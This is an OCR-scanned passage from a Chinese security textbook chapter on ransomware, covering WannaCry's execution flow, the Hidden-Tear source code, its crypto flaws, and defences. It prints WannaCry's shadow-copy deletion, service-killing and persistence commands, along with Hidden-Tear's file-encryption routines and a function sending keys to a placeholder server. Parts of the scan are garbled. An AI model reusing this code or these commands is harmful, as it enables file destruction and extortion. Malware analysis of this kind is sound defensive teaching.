HadesLocker 是 2016 年 10 月 新 爆发 的 一 个 敲诈 勒索 类 木马 ,会 加 密 用 户 特定 扩展 名 
的 文件 ,包括 本 地 驱动 器 和 网 络 驱 动 器 ,加 密 后 文件 扩展 名 为 . 一 HL 加 5 个 随机 字符 ,然后 
生成 TXT、.HTML、PNG 3 种 形式 的 文件 来 通知 用 户 支付 赎金 ,桌面 背景 也 会 被 改 为 生成 
的 PNG 文件 。 

2. Zepto(Lock 变种 ) 

Zepto 是 2016 年 6 月 底 出 现 的 恶意 代码 ,该 恶意 代码 与 知名 勒索 型 恶意 代码 家 族 
Locky 有 紧密 联系 。Zepto 通过 钓鱼 邮件 传播 ,邮件 中 附带 一 个 . zip 格式 的 压缩 包 , 其 中 包 
含 恶意 的 .js JavaScript 脚本 文件 。 一 旦 执行 ,受害 者 的 文件 资料 会 被 勒索 型 恶意 代码 使 用 
RSA 算法 加 密 , 并 会 在 后 级 名 中 增加 . zepto 字符 串 。 

3. Petya 

Petya 最 初 被 安全 公司 趋势 科技 发 现 。 它 的 标志 就 是 “死亡 红 屏 ”。 在 成 功 渗透 进入 
Windows 系统 之 后 ,木马 会 强迫 用 户 重启 计算 机 。 而 重启 之 后 ,计算 机 就 再 也 进入 不 了 
Windows 了 ,而 是 会 自动 加 载 一 个 勒索 页 面 , 向 受害 者 索要 0. 99 比特 币 的 赎金 。 

然而 ,这 个 时 候 如 果 急 于 支付 赎金 ,就 太 冤 了 。 经 过 分 析 , 安 全 人 员 发 现 了 这 个 木马 是 
由 “偷懒 的 黑客 ”设计 的 。 它 虽然 看 起 来 凶恶 得 无 以 复 加 ,但 实际 上 只 修改 了 系统 的 引导 记 
录 以 及 加 密 了 主 文件 表 , 真 正 的 文件 还 原封 不 动 地 存在 于 磁盘 中 。 
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8.2.4 勒索 型 恶意 代码 加 密 算法 


加 密 算 法 是 勒索 型 恶意 代码 核心 技术 之 一 。 如 果 加 密 算 法 容易 被 破解 ,那么 勒索 方 就 
没 办 法 赚 到 赎金 ,所 以 ,勒索 病毒 的 制作 者 都 希望 把 加 密 算法 做 到 足够 强大 ,让 受害 者 无 法 
破解 。 一 般 勒 索 型 恶意 代码 常用 的 加 密 方 法 如 表 8-1 所 示 。 


表 8-1 勒索 型 恶意 代码 常用 加 密 方法 


序号 类 型 算 法 恶意 代码 实例 
1 自 定义 的 加 密 方法 病毒 作者 自 编 加 密 算法 Apocalypse 
3 1 层 加 密 算法 AES Jigsaw 
3 2 层 加 密 算法 RSA-AES CryptoWall, Locky, Petya, Unlock92 
4 3 层 加 密 算法 ECDH-ECDH-AES Cerber, CTB_Locker, TeslaCrypt 
5 第 三 方 加 密 模块 WINRAR 或 GNUPG 等 | CryptoHost, Vault 


如 表 8-1 所 示 ,除了 Apocalypse 勒索 病毒 使 用 了 自 定 义 的 算法 ,大 多 数 勒索 型 恶意 代 
码 使 用 了 标准 的 加 密 算 法 。 在 所 有 加 密 算 法 中 ,AES 算法 被 使 用 得 最 多 ,其 次 是 RSA 算 
法 ,部 分 勒索 病毒 也 使 用 了 ECDH 算法 。 

由 于 这 些 标 准 加 密 算 法 被 认为 是 无 法 破解 的 ,而 部 分 勒索 病毒 可 以 被 破解 的 最 大 原因 
是 因为 标准 加 密 算 法 使 用 不 当 。 例 如 , WannaCry 勒索 病毒 爆发 后 就 被 发 现存 在 加 密 漏 洞 ， 
并 被 诸多 安全 厂商 推出 了 文件 恢复 工具 ,帮助 受害 者 成 功 恢复 数据 。 


8.3 ”WannaCry 恶意 代码 分 析 


全 球 主流 的 勒索 型 恶意 代码 家 族 ( 类 型 ) 有 75 种 之 多 。 据 360 互联 网 安全 中 心 监 测 显 
示 , Cerber、Locky 和 XTBL 是 目前 最 主流 的 三 大 勒索 恶意 代码 家 族 。 其 中 ,Cerber 占 比 为 
48.0%,Locky 占 比 为 20%,XTBL 占 比 为 9. 0% (图 8-2)。 本 节 接 下 来 主要 分 析 其 中 的 
WannaCry ,该 病毒 使 用 了 著名 的 “永恒 之 蓝 ” 漏 洞 。 


8-2 勒索 型 恶意 代码 分 布 情况 
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2017 年 5 月 12 日 ,爆发 了 WannaCry 勒索 病毒 安全 事件 。 此 病毒 利用 微软 操作 系统 
MS17-010 漏洞 (永恒 之 蓝 ) 在 全 球 范围 进行 大 规模 传播 ,至 少 有 99 个 国家 超过 20 万 台 计 算 
机 主机 遭受 到 攻击 。 我 国 作 为 全 球 互联 网 用 户 最 多 的 国家 ,也 深 受 此 次 病毒 事件 的 危害 。 
WannaCry 勒索 病毒 的 爆发 ,是 继 “ 冲 击 波 ”“ 震 荡 波 ” 之 后 又 一 个 全 球 性 的 恶意 代码 安全 事 
件 , 其 影响 力 、 破 坏 力 已 远 超 上 述 两 个 蠕虫 病毒 。 


8.3.1 基本 模块 
WannaCry 勒索 病毒 功能 结构 模块 如 图 8-3 所 示 。 


3 个 功能 模块 协同 联动 ,最 终 实现 了 勒索 病毒 快速 伟 扫 | 食 [ 攻 | 要 | 通 | 隐 | 拘 
播 ,快速 感染 、 磁 盘 数据 加 密 的 传播 攻击 链条 。 考 | 焉 | 十 | 列 | 信 | 本 | 镶 
1. 蠕虫 模块 蠕虫 模块 


蠕虫 模块 是 具有 传统 蠕虫 病毒 的 特征 及 核心 功能 
的 模块 ,具备 了 常见 的 主机 扫描 功能 、 端 口 及 漏洞 探测 利用 MS17-010 油 洞 (永恒 之 蓝 ) 
功能 ,代码 注入 功能 .通信 功能 等 模块 。WannaCry 勒 上 测 漳 利用 模块 
索 型 恶意 代码 会 通过 探测 扫描 方式 ,判断 Windows 主 


机 端口 SMB(v1、v2 版 本 )445 是 否 开放 ,进而 利用 漏洞。| ， pi 本 
校 验方 式 验证 主机 是 否 存在 漏洞 ,为 下 一 步 Windows 
SMB 远程 代码 执行 漏洞 MS17-010 的 执行 进行 信息 图 8-3 ”WannaCry 的 模块 
收集 。 

2. 漏洞 利用 模块 


“永恒 之 蓝 " 是 NSA 泄露 的 一 个 高 威胁 可 利用 漏洞 ,通过 利用 该 漏洞 ,攻击 者 会 轻松 侵 
和 人 操作 系统 层面 ,实现 WannaCry 病毒 的 快速 植 人 。 因 此 ,此 模块 在 整个 WannaCry 勒索 病 
毒 结构 中 最 为 关键 , 它 是 决定 能 和 否 成 功 植 人 勒索 型 恶意 代码 的 重要 环节 。 

3. 勒索 模块 

WannaCry 勒索 病毒 主要 使 用 WNCRY 家 族 和 ONION 家 族 的 勒索 病毒 模块 ,该 模 
块 本 身 不 具备 主动 传播 漏洞 利用 等 功能 。 当 病毒 借助 蠕虫 模块 “永恒 之 蓝 ” 模 块 传播 植 入 
宿主 并 被 激活 后 ,将 会 对 主机 上 的 文件 进行 加 密 , 同 时 弹出 勒索 对 话 框 ,提示 勒索 目的 及 接 
收 勒索 赃款 的 账户 信息 。WannaCry 勒索 病毒 的 攻击 流程 与 其 他 蠕虫 类 病毒 并 无 太 大 差 
异 , 主 要 差别 在 于 其 攻击 载荷 使 用 了 较 新 的 远程 执行 代码 和 病毒 体 。 


8.3.2 详细 过 程 


WannaCry 勒索 型 恶意 代码 的 执行 流程 类 似 于 其 他 勒索 型 恶意 代码 。 它 的 特别 之 处 
是 ,首先 访问 一 个 程序 预 设 的 域名 ,这 是 一 个 开关 函数 ,如 果 该 域名 存在 则 终止 运行 ,否则 ， 
执行 后 续 的 工作 。 判 断 之 后 ,勒索 软件 会 利用 EternalBlue( 永 恒 之 蓝 )/MS17-010 漏洞 感染 
其 他 主机 。 同 时 WannaCry 会 对 系统 进行 破坏 、 加 密 文件 .删除 备份 、 显 示 支 付 比特 币 赎 金 
页 面 等 一 系列 工作 。 图 8-4 所 示 是 该 恶意 代码 的 执行 流程 。 
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一 、 判 断 及 感染 访问 : www.iuqerfsodp9ifia 
Posdfjhgosurijfaewrwergwe 
a.com 
(DD 四 
Yes 下 在 关闭 进程 加 
1932 生成 res 文 件 密 
I™ 删除 备份 荐 
设置 SMB 连 接 于 
检测 MS17-010 漏 油 ; {©® 
生成 Base64 利 用 代码 = 一 一 | 3a， 创建 新 服务 
检测 DoublePulsar 2b: 释放 exe 程 序 
执行 利用 代码 二 wn 加价 订 
运行 Taskdl.exe 
村 和 化 
加 载 资源 ， 他 建 化 和 入 从 
新 服务 创建 Please_Read_me.txt 
=、 加 密 流程 
| 运行 TaskStart， 执 | 
OO 行 加 密 的 DLL 
e| © je@ 
-] | 准备 公 钥 准备 加 密 密 钥 
准备 Tor 匿 名 网 络 | | 打开 密码 保护 压 | | 加 密 AES 密 钥 创建 锁 (@) 
加 载 比特 币 钱包 | | 缩 包 解密 DLL 开始 加 密 文 件 
-、 准 备 勒 索 代码 


图 8-4 WannaCry 详细 流程 图 


1. 初始 感染 和 扩散 
(1) 域名 判断 。 尝 试 访问 域名 (如 www. iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea. 
com) ,如 果 成 功 则 退出 恶意 代码 ,程序 终止 ,不 会 造成 任何 破坏 。 如 果 该 域名 不 存在 , 则 执 


行 后 续 步 又 。 


(2) 创建 exe 文件 ,并 以 服务 方式 运行 。 
如 果 命 令 行 args 参数 设置 为 -m security ,会 执行 如 下 操作 。 


Q@ 打开 SC 管理 器 。 
@ 创建 名 为 Microsoft Security Center (2. 0) Service(mssecsvc2.0) 的 新 服务 ,对 应 执 


行 文 件 为 mssecsvVvc. exe。 


@ 执行 服 
@ 加 载 ta 


@ 保存 为 C:\\WINDOWS\\tasksche. exe。 


务 。 
sksche. exe 源 文件 。 


a 将 C:\\WINDOWS\\tasksche. exe 移动 到 C:\\WINDOWS\\gqeriuwjhrf。 

如 果 参 数 不 为 \m security, 则 通过 SMB 漏洞 对 应 的 Eternal Blue / Double Pulsar 利用 
方法 来 进行 扩散 。 

Q@ 打开 SC 管理 器 。 
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@ 访问 mssecsvc2. 0 服务 。 

@ 改变 服务 配置 。 

@ 开启 Crtl Dispatcher 服务 (通过 SMB 利用 方法 运行 ) 。 
2. 准备 勒索 代码 

(1) 解压 zip 文件 并 准备 好 Tor 和 比特 币 信 息 。 

@ 用 硬 编码 密码 “WNery@2o17” 提 取 zip 源 文件 XIA。 

@ 得 到 包含 Tor 配置 的 c. wnry 文件 。 

@ 从 c. wnry 中 提取 使 Tor 浏览 器 和 用 于 通信 的 洋葱 站 点 。 


gx7ekbenv2riucmf. onion 

57g7spgrzlojinas. onion; 
xxlvbrloxvriy2c5, onion; 
76jdd2ir2embyv47. onion; 
cwwnhwhlz52maqgm7. onion; 


@ 加 载 攻击 者 设置 的 支付 赎金 的 比特 币 钱包 地 址 ,更 新 c. wnry。 

(2) 隐藏 zip 文件 的 解压 目录 并 且 修改 安全 描述 符 。 

Q@ 建立 进程 : 运行 “attrib 十 h . "命令 来 隐藏 当前 目录 。 

@ 执行 icacls . /grant Everyone:F /T/C /Q. 命令 ,人 允许 所 有 用 户 完全 访问 当前 目录 
和 子 目 录 中 的 所 有 文件 。 

(3) 准备 加 密 公 钥 .AES 密 钥 ,解密 动态 链接 库 。 

QO@ 使 用 getprocaddress 函数 来 加 载 导出 函数 。 


CreateFileW, WriteFile, ReadFile, MoveFileW, MoveFileExW, DeleteFileW, CloseHandle 


@ 设置 加 密 密 钥 。 
a， 导出 加 密 函 数 。 


CryptGenKey, CryptDecrypt, CryptEncrypt, CryptDestroyKey, CryptImportKey,CryptAcquireContextA 


b. 获取 RSA_AES 加 密 程序 

c. CryptImportKey 导入 硬 编码 的 公 钥 。 

d. 获取 本 机 系统 信息 以 及 执行 GetProcessHeap。 

e. 将 加 密 数 据 放 在 堆 内 存 中 。 

f. 更 改 对 于 该 内 存 位 置 的 保护 。 

(4) 运行 DLL 导出 文件 的 TaskStart 函数 。 

(5) 创建 用 于 加 密 用 户 文件 的 密 钥 

Q@ 使 用 公 钥 加 密 用 户 的 私 钥 并 存储 在 %08X. eky 中 。 

@ 访问 %08X. dky 获取 解密 密 钥 。 

(6) 为 所 有 线程 创建 Mutex: Global\\MsWinZonesCacheCounterMutexW。 如 果 这 个 
Mutex 存在 ,恶意 软件 将 无 法 启动 ,因而 也 是 另 一 种 防范 方法 。 

(7) 创建 新 线程 ,用 于 加 密 文件 。 使 用 CryptGenKey 生成 用 于 加 密 文件 的 AES 密 钥 ， 
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加 密 文件 。 
3. 加 密 流程 
(1) 创建 新 的 线程 ,覆盖 磁盘 上 的 文件 。 
@ 生成 一 个 密 钥 。 
@ 为 每 个 文件 生成 数据 缓冲 区 。 
@ 使 用 线程 调用 StartAddress 函数 ,加 密 文件 内 容 。 
@ 添加 . WNCRYT 后 级 。 
(2) 在 新 线程 中 运行 新 进程 taskdl. exe。 
(3) 解密 持久 化 配置 。 
JD 读 取 配 置 文件 。 
@ 找到 @WanaDecryptor@. exe 文件 的 位 置 。 
@ 创建 进程 taskse. exe@ WanaDecryptor@. exe。 
@ 设置 启动 项 在 重新 启动 时 自动 运行 。 


HKCU\ SOFTWARE\Microsoft\Windows\CurrentVersion\Run 
@ 运行 命令 ; 

CheckTokenMembership, GetComputerNameInfo 

@ 运行 命令 : 


cmd. exe /c reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "<rand>" /t REG_ 
SZ /d "\"tasksche. exe"\" /f 


Q@ 查找 f. wnry。 

(4) 运行 @WanaDecryptor@. exe。 

OO 读 取 Tor Client 的 配置 文件 。 

@ 运行 Tor 客户 端 。 可 以 连接 到 上 面 列 出 的 . onion 网 站 ,以 便 用 户 付款 和 跟踪 。 
(5) 持久 化 @WanaDecryptor@. exe, 备 份 。 

@ 通过 批 处 理 脚 本 创建 Ink 文件 @WanaDecryptor@. exe. Ink。 


@echo off 

echo SET ow = WScript.CreateObject("WScript.Shell")> m.vbs 

echo SET om = ow.CreateShortcut("@WanaDecryptor@ .exe. lnk")>> m. vbs 
echo om. TargetPath = "@WanaDecryptor@ .exe">> m. vbs 

echo om. Save >> m. vbs 

cscript. exe //nologo m. vbs 

del m. vbs 


@ 写 人 名 称 为 随机 整数 的 bat 文件 。 

a. 执行 bat 脚本 。 

b. 执行 删除 命令 del /a %%0。 

(6) 从 r. wnry 创建 勒索 提示 信息 @Please_Read_Me@ . txt。 
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4. 加 密 文件 

(1) 关闭 正在 运行 的 数据 库 和 邮件 服务 相关 进程 。 
OO 获取 UserName。 

@ 获取 驱动 器 类 型 。 

Q) 运行 ， 

askkill. exe /f /im Microsoft. Exchange. * 

taskkill. exe /f /im MSExchange * 

taskkill. exe /f /im sqlserver. exe 


taskkill. exe /f /im sqlwriter. exe 
taskkill. exe /f /im mysqld. exe 


@ 检查 磁盘 空闲 空间 。 

@@ 循环 遍历 文件 ,同时 加 密 。 

(2) 运行 @WanaDecryptor@. exe。 

@ 写 入 .res 文件。 

@ 运行 Tor 服务 : taskhsvc. exe TaskData\Tor\taskhsvc. exe。 

(3) 运行 : cmd. exe /c start /b @WanaDecryptor@. exe。 

使 用 以 下 命令 删除 卷 副 本 。 

Cmd. exe /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} 
bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin 
delete catalog — quiet 

Cmd. exe /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} 


bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin 
delete catalog — quiet 


8.4 Hidden-Tear 源 代码 分 析 


Hidden-Tear 是 由 土耳其 的 安全 研究 人 员 Utku Sen 在 2015 年 编写 的 一 款 勒索 型 恶意 
代码 , 它 使 用 AES 密码 算法 加 密 用 户 文件 ,并 给 出 警告 及 勒索 信息 ,提醒 用 户 交 付 赎 金 。 
Hidden-Tear 是 一 款 开源 的 教学 型 勒索 病毒 ,因此 , 它 只 用 于 教育 目的 ,不 要 把 它 当 作 真 正 
的 病毒 看 待 。 

读者 可 以 在 github 上 查询 到 Hidden-Tear 勒索 型 恶意 代码 的 开源 代码 ,并 根据 本 节 的 
流程 对 其 进行 分 析 与 学 习 。 该 源码 由 C# 编 写 ,比较 容易 读 懂 。 


8.4.1 Hidden-Tear 的 代码 特征 


Hidden-Tear 的 作者 写 这 款 开 源 病毒 的 动机 是 什么 呢 ? 大 多 数 勒 索 型 恶意 代码 是 由 汇 
编 语言 编 写 的 ,对 于 那些 熟悉 汇编 语言 的 人 来 说 ,阅读 分 析 这 些 代码 并 不 那么 棘手 ,然而 对 
于 大 多 数 人 来 说 并 非 这 样 ,尤其 是 对 于 新 手 来 说 。 此 外 ,网 上 并 没有 任何 适合 新 手 学 习 用 的 
勒索 软件 样本 的 源 代码 。 所 以 ,作者 的 第 一 个 动机 就 是 为 新 手提 供 一 份 源 代码 ,这 些 新 手包 
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括 试图 理解 整个 过 程 的 学 生 。 第 二 个 动机 是 为 脚本 小 子 构建 一 个 蜜 钠 。 经 粗略 的 浏览 可 
知 , Hidden-Tear 勒索 病毒 总 体 概况 如 下 。 

(1) 使 用 AES 加 密 算法 。 

(2) 密 钥 会 发 送 给 服务 器 端 。 

(3) 加 密 文 件 可 以 在 解密 程序 中 输入 密 钥 后 被 解密 。 

(4) 在 桌面 生成 说 明文 件 和 警告 信息 ( 含 付款 途径 )。 

(5) 程序 总 大 小 仅 12KB, 非 常 精简 。 


8.4.2 Hidden-Tear 关键 代码 分 析 


1. 代码 流程 图 


如 图 8-5 所 示 , Hidden-Tear 病毒 的 关键 步骤 包括 初始 化 、 获 取 参 数 、 窗 体 可 视 化 配置 、 
产生 随机 密码 ,发送 随机 密码 到 服务 器 ,加 密 根 目录 下 的 文件 ,生成 警告 信息 等 。 接 下 来 的 
几 个 部 分 ,将 对 这 些 关 键 模 块 进行 分 析 和 解释 。 


(开始 


1 1 
1 网 
加 密 根 目录 下 
初始 化 和 
的 文件 
1 
获取 信息 
定义 参数 |! 1 
| 上 习 人 I 
1 乡 村 全 根 目录 下 生成 
发 送 随机 密码 tt : 进 
E 上 了 勒索 
可 视 化 配置 aa 


图 8-5 Hidden-Tear 的 源 代码 流程 图 


2. 程序 入 口 


using System; 

Using System.Collections.Generic; 
using System.Linq; 

using System,.Threading,Tasks; 
using System,Windows,Forms; 


namespace hidden_tear 
static class Program 
{ 


/// <summary> 

/// The main entry point for the application, 
/1/11 </summary> 

[STAThread] 

static void Main() 

bp 


Application.EnableVisualStyles(); 
Application.SetCompatibleTextRenderingDefault (false); 
Application.Run(new Form1()); 
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用 可 视 化 设置 : Application. EnableVisualStyles(); 


判 窟 卫 


启 form 界面 : Application. Run(new Forml() ); 
3. 定义 参数 


V/Urt to send encryption password and computer info 

string targetURL = "https://www.example.com/hidden-tear/write.php?info="; 
string userName = Environment.UserName; 

string computerName = System.Environment.MachineName.ToString(); 

string userDir = "C:\\Users\\"; 


targetURL: 传递 密 钥 和 计算 机 信息 的 地 址 。 
userName: 系统 和 应 用 程序 的 当前 用 户 。 


computerName: 本 地 计算 机 的 NetBIOS 名 称 ( 包 含 计 算 机 名 称 的 字符 串 )。 


userDir: 文件 路 径 。 

4. 窗 体 相关 函数 

1) 窗 体 加 载 事件 一 一 创建 时 触发 

Re void Form1_Load(object sender, EventArgs e) 
Opacity = 0; 
this.ShowInTaskbar = false; 
//starts encryption at form load 
startAction(); 

} 

将 窗 体 设置 为 透明 :Opacity 二 0; 

不 在 任务 栏 上 显示 该 进程 : this. ShowInTaskbar = false; 

调用 startAction( 〇 函数 。 

2) 窗 体 显示 事件 一 一 首次 显示 时 触发 


private void Form_Shown(object sender，EventArgs e) 


Visible = false; 
OQpacity = 100; 


隐藏 窗 体 : Visible = false; 
不 透明 : Opacity 二 100; 
5. 加 密 相关 函数 


1) AES 加 密 算法 
//AES encryption algorithm 
public byte[] AES_Encrypt(byte[] bytesToBeEncrypted, byte[] passwordBytes) 
byte[] encryptedBytes = null; 
byte[] saltBytes = new byte[] { 1, 2, 3, 4, 5, 6, 7, 8 }; 
using (MemoryStream ms = new MemoryStream()) 


using (RijndaelManaged AES = new RijndaelManaged()) 


AES.KeySize = 256; 
AES.BlockSize = 128; 


用 GDI 方式 显示 文本 : Application. SetCompatibleTextRenderingDefault(false) ; 
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var key = new Rfc2898DeriveBytes(passwordBytes, saltBytes, 1000); 

AES.Key = key.GetBytes(AES.KeySize / 8); 

AES.IV = key.GetBytes(AES.BlockSize / 8); 

AES.Mode = CipherMode.CBC; 

using (var cs = new CryptoStream(ms, AES.CreateEncryptor(), CryptoStreamMode.Write)) 
* 


cs.Write(bytesToBeEncrypted, 08, bytesToBeEncrypted.Length); 
cs.Close(); 


3 
encryptedBytes = ms.ToArray(); 
} 
} 


return encryptedBytes; 


从 上 述 源 代码 可 知 , Hidden-Tear 使 用 的 AES 特征 如 下 。 

(1) 使 用 AES-256-CBC 加 密 参 数 。 

Q@ 设置 密 钥 为 256 位 。 

@ 加 密 操 作 块 大 小 为 128 位 。 

(2) 使 用 基于 HMACSHAI 的 伪 随 机 数 生成 器 ,实现 密 钥 派生 功能 。 

@ 通过 使 用 密码 ,salt 值 ( 在 密码 任意 固定 位 置 插 入 特定 的 字符 串 让 散 列 后 的 结果 和 
使 用 原始 密码 的 散 列 结果 不 相符 ) 和 迭代 次 数 派生 密 钥 。 

@ 使 用 伪 随 机 密 钥 设置 加 密 密 钥 。 

@ 使 用 伪 随 机 密 钥 设置 对 称 算法 的 初始 化 向 量 。 

@ 设置 对 称 算 法 的 运算 模式 : CBC。 

a. 每 个 纯 文本 块 在 加 密 前 ,与 前 一 块 的 加 密 文本 进行 按 位 异 或 运算 (防止 即使 有 很 多 
相同 的 块 也 不 会 被 加 密 到 相同 的 密 文 )。 

b. 初始 化 向 量 与 第 一 个 纯 文本 块 进行 按 位 异 或 后 在 对 第 一 个 文本 块 进行 加 密 。 

c.， 如 果 有 一 位 出 错 则 整个 纯 文本 块 都 会 出 错 , 紧 接 着 下 一 块 的 加 密 也 会 在 同样 的 地 方 出 错 。 

(3) 使 用 CryptoStream。 

J@ 将 当前 数据 流连 接 到 加 密 流 。 

@ 使 用 现 有 的 key 属性 和 1IV 属性 (初始 化 向 量 ) 建 立 加 密 器 对 象 。 

@ 对 加 密 流 开启 写 入 访问 权限 。 

@ 将 待 加 密 的 字符 串 字 节 数组 写 信 到 加 密 流 中 。 

(4) 将 流 内 容 写 人 到 返回 结果 的 字 节 数组 中 。 

2) 加 密 用 的 随机 密码 


//creates random password for encryption 
public string CreatePassword(int length) 
const string valid = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ123456789@*!=&?78&/"; 
StringBuilder res = new StringBuilder(); 
Random rnd = new Random(); 
while (9 < Length 一 ){ 
res.Append(vatid[rnd.Next(vatid.Length)]); 


return res.ToString(); 
} 


使 用 伪 随 机 数 生成 器 (依赖 时 间 的 默认 种 子 ), 生 成 不 小 于 valid 字符 长 度 的 非 负 随机 
数 。 在 valid 字符 串 后 追加 伪 随 机 数 。 


第 8 章 勤 索 型 恶意 代码 


3) 信息 反馈 给 服务 器 端 


//Sends created password target location 
public void SendPassword(string password){ 


string info = computerName + "-" + UserName + " " + password; 
var fullUrl = targetURL + info; 


var conent = new System.Net.WebClient().DownloadString(fullUrl); 
} 


向 服务 器 发 送 fullurl 的 请 求 , 则 服务 器 可 以 从 该 请 求 中 得 知 信 息 与 密 钥 。 
4) 加 密 单个 文件 


//Encrypts single file 
public void EncryptFite(string file, string password) 
受 


byte[] bytesToBeEncrypted = File.ReadAllBytes(file); 
byte[] passwordBytes = Encoding.UTF8,GetBytes(password); 


// Hash the password with SHA256 
passwordBytes = SHA256.Create() ,ComputeHash(passwordBytes); 


byte[] bytesEncrypted = AES_Encrypt(bytesToBeEncrypted, passwordBytes); 
File.WriteAllBytes(file, bytesEncrypted); 


System.10,File.Move(file, file+",.locked"); 
} 


加 密 单个 文件 的 步骤 如 下 。 

(1) 打开 需要 进行 读 取 的 文件 ,并 将 文件 内 容 读 入 字 节 数组 ,再 关闭 文件 。 
(2) 将 密码 从 字符 串 转 为 字 节 数组 。 

(3) 使 用 SHA256 对 密码 数组 进行 Hash 运算 。 

(4) 调用 AES 加 密 函 数 ,结果 返回 到 字 节 数组 中 。 

(5) 将 加 密 后 的 字 节 数 组 写 入 原文 件 中 。 

(6) 重 命名 文件 : 添加 . locked 到 文件 名 中 。 

5) 加 密 目 录 下 的 所 有 文件 


//encrypts target directory 
public void encryptDirectory(string location, string password) 
4 


//extensions to be encrypt 
var validExtensions = new[] 


"pptx", "odt", 


string[] files = Directory.GetFiles(location); 
string[] childDirectories = Directory.GetDirectories(location); 
for (int i = 0; i < files.Length; i++){ 
string extension = Path.GetExtension(files[i]); 
if (validExtensions.Contains(extension)) 
{ 
EncryptFile(files [i],password); 


} 
for (int i = 9; i < childDirectories.Length; i++){ 
encryptDirectory(childDirectories [i],password); 


Fo 
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加 密 某 个 目录 下 所 有 文件 的 步骤 如 下 。 

(1) 建立 要 加 密 文件 类 型 的 后 级 名 单 。 

(2) 获取 目录 中 各 文件 的 路 径 , 获 取 目 录 中 的 子 目 录 路 径 。 

(3) 逐个 匹配 文件 路 径 数组 中 每 个 元 素 的 后 级 名 是 否 为 名 单 中 的 元 素 。 
@ 对 名 单 中 元 素 调 用 单个 文件 加 密 函 数 。 

@ 非 名 单 中 元 素 则 跳 过 。 

(4) 递归 加 密 目 录 函 数 ,遍历 子 目 录 。 

6) 加 密 操 作 的 入 口 函 数 


be void startAction() 
string password = CreatePassword(15); 
string path = "\\Desktop\\test"i| 
string startPath = userDir + userName + path; 
SendPassword(password); 
encryptDirectory(startPath, password); 
messageCreator(); 
password = null; 
System,.Windows.Forms.Application.Exit(); 
(1) 人 遍历“C:\Users\" 十 userName 十 "\Desktop\test” 下 的 文件 进行 试验 ,实际 勒索 型 
恶意 代码 使 用 时 直接 遍历 C:\Users 下 文件 并 加 密 。 
(2) 调用 SendPassword 函数 将 密码 和 计算 机 信息 发 送 给 服务 器 。 
(3) 调用 messageCreator() 函数 。 
(4) 将 密码 重 置 为 NULL。 
(5) 退出 该 进程 。 


6. 告知 用 户 已 被 加 密 


public void messageCreator() 
{ 
string path = "\\Desktop\\test\\READ_IT. txt"; 
string fullpath = userDir + UserName + path; 
string[] lines = { "Files has been encrypted with hidden tear", 


"Send me some bitcoins or kebab", "And I also hate night clubs, desserts, being drunk." }; 
System. I0.File.writeAllLines(fullpath, lines); 


在 用 户 的 根 目 录 下 添加 txt 文件 告知 用 户 文件 已 被 加 密 , 从 而 进行 勒索 。 
8.4.3 ”Hidden-Tear 加 密 的 漏洞 

由 于 Hidden-Tear 是 一 款 以 新 手 教学 为 目的 而 开发 的 勒索 病毒 ,因此 ,在 加 密 部 分 存在 
较 多 的 漏洞 。 有 经 验 的 密码 研究 人 员 一 眼 就 能 看 出 这 些 漏洞 。 

1. 随机 算法 的 种 子 

最 重要 的 安全 漏洞 存在 于 创建 随机 加 密 密 钥 的 过 程 中 。 作 者 使 用 了 . Net 中 的 Random 类 
来 产生 随机 字符 串 。Random 类 使 用 了 Environment. TickCount( 得 到 系统 启动 以 来 经 过 的 毫 
秒 数 ) 作 为 种 子 , 它 仅仅 能 够 减弱 表面 的 暴力 攻击 , 除 此 之 外 它 很 容易 预测 得 到 。 

2. 攻击 向 量 的 重用 

在 加 密 过 程 中 ,算法 对 于 每 个 文件 都 使 用 相同 的 攻击 向 量 (IV) 。 
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3. 静态 盐 
Hidden-Tear 勒索 病毒 使 用 静态 盐 (Static Salt) 进行 加 密 。 


byte[ ] saltBytes = new byte[] { 1, 2, 3, 4, 5, 6, 7, 8 }; 
4. 发 送 密 钥 


密 钥 是 通过 一 个 未 加 密 的 GET 请 求 发 送 到 服务 器 的 .如 果 当 时 网 络 正在 监听 ,那么 通过 检查 日 志 可 以 
很 容易 地 找到 密 钥 . 


//Sends created password target location 
public void SendPassword( string password){ 


string info = computerName + "一 ”+ userName + " " + password; 

var fullUrl = targetURL + info; 

var conent = new System. Net. WebClient().DownloadString(fullUrl); 
| 


8.5 防范 与 应 对 策略 


当 计算 机 系统 被 勒索 型 恶意 代码 感染 并 被 加 密 后 ,数据 恢复 的 难度 是 和 恶意 代码 采用 
的 加 密 算 法 及 加 密 方 式 相关 的 。 勒 索 型 恶意 代码 通常 会 采用 高 强度 加 密 方式 加 密 系 统 文件 
甚至 包括 备份 文件 。 此 时 进行 逆向 破解 十 分 困难 ,其 成 本 往往 超过 勒索 者 勒索 的 金额 ,试图 
去 解密 被 加 密 的 数据 或 设备 是 徒劳 的 。 由 此 可 知 ,积极 预防 ,不 留 给 勒索 型 恶意 代码 感染 的 
机 会 是 非常 重要 的 。 


8.5.1 增强 安全 意识 


1. 使 用 防护 工具 

部 署 电子 邮件 防护 产品 ,对 电子 邮件 附件 进行 病毒 扫描 。 应 该 对 包括 移动 终端 在 内 的 
所 有 主机 进行 防护 ,采取 的 措施 除了 安装 传统 的 杀毒 软件 外 ,还 应 包括 补丁 管理 .Web 内 容 
过 滤 以 及 主动 防护 类 的 病毒 防护 产品 等 。 

2. 慎重 下 载 

谨慎 处 理 邮件 附件 与 网 络 下 载 文件 ,增强 所 有 用 户 的 辨别 能 力 ,不 随意 下 载 不 可 信 资 
源 , 不 打开 垃圾 邮件 和 可 疑 邮件 ,不 轻信 社交 网 络 平台 上 的 链接 。 

留心 非 预期 的 电子 邮件 ,尤其 是 里 面包 含 链接 或 附件 的 情况 。 用 户 应 当 特 别 小 心 任何 
要 求 启 用 宏 以 查看 内 容 的 微软 办 公 软 件 ,除非 完全 确定 这 是 来 自 于 可 信 源 的 真实 邮件 ,否则 
就 不 要 启用 宏 。 


8.5.2 备份 重要 文件 
在 应 对 未 知 的 安全 威胁 时 ,备份 是 唯一 有 效 的 方法 。 因 此 ,需要 确保 有 人 额外 的 备份 措施 
